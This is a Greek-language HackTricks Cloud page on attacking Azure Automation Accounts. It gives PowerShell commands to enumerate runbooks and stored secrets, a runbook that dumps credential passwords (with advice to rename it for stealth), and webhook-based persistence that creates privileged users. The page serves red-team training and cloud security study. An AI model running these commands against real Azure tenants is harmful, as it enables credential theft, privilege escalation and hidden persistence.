Az - Automation Account

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Από τα έγγραφα: Το Azure Automation παρέχει μια υπηρεσία αυτοματοποίησης, ενημερώσεων λειτουργικού συστήματος και διαμόρφωσης που υποστηρίζει συνεπή διαχείριση σε περιβάλλοντα Azure και μη Azure. Περιλαμβάνει αυτοματοποίηση διαδικασιών, διαχείριση διαμόρφωσης, διαχείριση ενημερώσεων, κοινές δυνατότητες και ετερογενή χαρακτηριστικά.

Αυτά είναι όπως οι "προγραμματισμένες εργασίες" στο Azure που θα σας επιτρέψουν να εκτελείτε πράγματα (ενέργειες ή ακόμη και σενάρια) για να διαχειριστείτε, να ελέγξετε και να διαμορφώσετε το περιβάλλον Azure.

Run As Account

Όταν χρησιμοποιείται το Run as Account, δημιουργεί μια εφαρμογή Azure AD με αυτο-υπογεγραμμένο πιστοποιητικό, δημιουργεί έναν υπηρεσιακό κύριο και αναθέτει τον ρόλο Contributor για τον λογαριασμό στην τρέχουσα συνδρομή (πολλές προνόμια). Η Microsoft προτείνει τη χρήση μιας Managed Identity για το Automation Account.

Αυτό θα αφαιρεθεί στις 30 Σεπτεμβρίου 2023 και θα αλλάξει σε Managed Identities.

Runbooks & Jobs

Τα Runbooks σας επιτρέπουν να εκτελείτε αυθαίρετο PowerShell κώδικα. Αυτό θα μπορούσε να καταχραστεί από έναν επιτιθέμενο για να κλέψει τα δικαιώματα του συνδεδεμένου κύριου (αν υπάρχει). Στον κώδικα των Runbooks μπορείτε επίσης να βρείτε ευαίσθητες πληροφορίες (όπως διαπιστευτήρια).

Αν μπορείτε να διαβάσετε τις εργασίες, κάντε το καθώς περιέχουν την έξοδο της εκτέλεσης (πιθανές ευαίσθητες πληροφορίες).

Πηγαίνετε στο Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections

Hybrid Worker

Ένα Runbook μπορεί να εκτελείται σε ένα δοχείο μέσα στο Azure ή σε έναν Hybrid Worker (μηχανή μη Azure). Ο Log Analytics Agent αναπτύσσεται στη VM για να την καταχωρίσει ως υβριδικό εργαζόμενο. Οι εργασίες του υβριδικού εργαζομένου εκτελούνται ως SYSTEM στα Windows και ως nxautomation λογαριασμός στα Linux. Κάθε Hybrid Worker είναι καταχωρισμένος σε μια Υβριδική Ομάδα Εργαζομένων.

Επομένως, αν μπορείτε να επιλέξετε να εκτελέσετε ένα Runbook σε έναν Windows Hybrid Worker, θα εκτελέσετε αυθαίρετες εντολές μέσα σε μια εξωτερική μηχανή ως System (καλή τεχνική pivot).

Compromise State Configuration (SC)

Από τα έγγραφα: Το Azure Automation State Configuration είναι μια υπηρεσία διαχείρισης διαμόρφωσης Azure που σας επιτρέπει να γράφετε, να διαχειρίζεστε και να συντάσσετε PowerShell Desired State Configuration (DSC) διαμορφώσεις για κόμβους σε οποιοδήποτε cloud ή σε τοπικό κέντρο δεδομένων. Η υπηρεσία εισάγει επίσης DSC Resources και αναθέτει διαμορφώσεις σε στοχευμένους κόμβους, όλα στο cloud. Μπορείτε να αποκτήσετε πρόσβαση στο Azure Automation State Configuration στην πύλη Azure επιλέγοντας State configuration (DSC) κάτω από Configuration Management.

Ευαίσθητες πληροφορίες θα μπορούσαν να βρεθούν σε αυτές τις διαμορφώσεις.

RCE

Είναι δυνατόν να καταχραστεί το SC για να εκτελούνται αυθαίρετα σενάρια στις διαχειριζόμενες μηχανές.

Az - State Configuration RCE

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

Δημιουργία Runbook

# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

Εξαγωγή Πιστοποιητικών & Μεταβλητών που ορίζονται σε έναν Λογαριασμό Αυτοματοποίησης χρησιμοποιώντας ένα Run Book

# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness

# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt

Μπορείτε να κάνετε το ίδιο πράγμα τροποποιώντας ένα υπάρχον Run Book, και από την διαδικτυακή κονσόλα.

Βήματα για τη Ρύθμιση Δημιουργίας Αυτοματοποιημένου Υψηλά Προνομιακού Χρήστη

1. Αρχικοποίηση ενός Λογαριασμού Αυτοματοποίησης

Απαιτούμενη Ενέργεια: Δημιουργήστε έναν νέο Λογαριασμό Αυτοματοποίησης.
Συγκεκριμένη Ρύθμιση: Βεβαιωθείτε ότι η επιλογή "Δημιουργία λογαριασμού Azure Run As" είναι ενεργοποιημένη.

2. Εισαγωγή και Ρύθμιση Runbook

Πηγή: Κατεβάστε το δείγμα runbook από το MicroBurst GitHub Repository.
Απαιτούμενες Ενέργειες:
Εισάγετε το runbook στον Λογαριασμό Αυτοματοποίησης.
Δημοσιεύστε το runbook για να το κάνετε εκτελέσιμο.
Συνδέστε ένα webhook στο runbook, επιτρέποντας εξωτερικούς ενεργοποιητές.

3. Ρύθμιση του Μοντέλου AzureAD

Απαιτούμενη Ενέργεια: Προσθέστε το μοντέλο AzureAD στον Λογαριασμό Αυτοματοποίησης.
Επιπλέον Βήμα: Βεβαιωθείτε ότι όλα τα Μοντέλα Αυτοματοποίησης Azure είναι ενημερωμένα στις τελευταίες εκδόσεις τους.

4. Ανάθεση Δικαιωμάτων

Ρόλοι προς Ανάθεση:
Διαχειριστής Χρηστών
Ιδιοκτήτης Συνδρομής
Στόχος: Αναθέστε αυτούς τους ρόλους στον Λογαριασμό Αυτοματοποίησης για τα απαραίτητα προνόμια.

5. Επίγνωση Πιθανής Απώλειας Πρόσβασης

Σημείωση: Να είστε ενήμεροι ότι η ρύθμιση τέτοιας αυτοματοποίησης μπορεί να οδηγήσει σε απώλεια ελέγχου της συνδρομής.

6. Ενεργοποίηση Δημιουργίας Χρήστη

Ενεργοποιήστε το webhook για να δημιουργήσετε έναν νέο χρήστη στέλνοντας ένα POST αίτημα.
Χρησιμοποιήστε το σενάριο PowerShell που παρέχεται, διασφαλίζοντας ότι θα αντικαταστήσετε το $uri με το πραγματικό σας URL webhook και θα ενημερώσετε το $AccountInfo με το επιθυμητό όνομα χρήστη και κωδικό πρόσβασης.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body

Αναφορές

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAz - ARM Templates / Deployments NextAz - State Configuration RCE

Last updated 3 days ago